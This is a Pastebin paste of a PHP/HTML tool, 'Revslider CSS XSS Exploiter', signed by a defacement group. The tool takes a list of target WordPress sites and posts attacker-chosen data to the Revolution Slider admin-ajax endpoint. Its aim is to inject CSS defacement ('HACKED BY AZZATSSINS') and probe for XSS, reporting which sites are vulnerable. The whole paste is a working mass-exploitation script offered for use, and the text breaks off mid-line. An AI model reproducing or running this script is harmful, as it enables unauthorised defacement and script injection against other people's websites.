Advertisement
CYBERSERKERS

Revslider CSS XSS Exploiter

Nov 17th, 2015
262
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.46 KB | None | 0 0
  1. <meta content="XPLOITER BY AZZATSSINS CYBERSERKERS OF PSYCHOPATH" name="description" />
  2. <title>!!!- XSS & CSS | REVOLUTION SLIDER | AZZATSSINS | BN-IDBTE4M -!!!</title>
  3. <body style='color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  4. <center>
  5. <form method="GET">
  6. <input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" value="http://target.mu" type="text" name="azzatssins"/>
  7. <br>
  8. <input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" value="HACKED BY AZZATSSINS" type="text" name="xcss"/>
  9. <br>
  10. <input style="background:dodgerblue;margin:1px;width:15%;padding:6px;color:#fff;border:0;font-weight:bold;" type="submit" value="EXECUTE" /><br>
  11. </form>
  12. </center>
  13. <?php
  14. /** AZZATSSINS **/
  15.  
  16. /************************/******************************************
  17. azzatssinscyberserkers@gmail.com
  18. ******************************************/
  19.  
  20. function hajar($yuerel, $dataAing=null) {
  21.     $cuih = curl_init();
  22.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  23.     if ($dataAing != null){
  24.         curl_setopt($cuih, CURLOPT_POST, true);
  25.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  26.     }
  27.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  28.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  29.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  30.     $eks = curl_exec($cuih);
  31.     curl_close($cuih);
  32.     return $eks;
  33. }
  34.  
  35. $cafc = $_GET['xcss'];
  36. $site =  $_GET['azzatssins'];
  37. $idbte4m = explode("\r\n", $site);
  38. if (!isset($site)) {
  39. } else {
  40.     foreach ($idbte4m as $uri) {
  41.         echo "<br>\n----------------<a [email protected]>AZZATSSINS</a>----------------";
  42.         echo "<br>\nTarget => " . $uri;
  43.         echo "\n";
  44.  
  45.         $azzatssinscyberserkers2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  46.             "action" => "revslider_ajax_action",
  47.             "client_action" => "get_captions_css",
  48.             "data" => $cafc)
  49.         );
  50.         $jasonB = json_decode($azzatssinscyberserkers2, true);
  51.         if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
  52.             echo "<br>\n[CSS] => <font color=red>NOT VULNERABLE</font>";
  53.         } elseif ($jasonB['success'] == true) {
  54.             echo "<br>\n[CSS] => <font color=lime>SUCCESS</font>";
  55.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  56.             echo "action=revslider_ajax_action&";
  57.             echo "client_action=get_captions_css";
  58.             echo "data=" . urlencode($cafc) . "\n";
  59.         }
  60.  
  61.         $azzatssinscyberserkers3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  62.             "action" => "revslider_ajax_action",
  63.             "client_action" => $cafc)
  64.         );
  65.         $jasonC = json_decode($azzatssinscyberserkers3, true);
  66.         if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
  67.             echo "<br><br>\n[XSS] => <font color=lime>SUCCESS</font>";
  68.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  69.             echo "action=revslider_ajax_action";
  70.             echo "client_action=" . urlencode($cafc) . "\n";
  71.         } else {
  72.             echo "<br><br>\n[XSS] => <font color=red>NOT VULNERABLE<
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement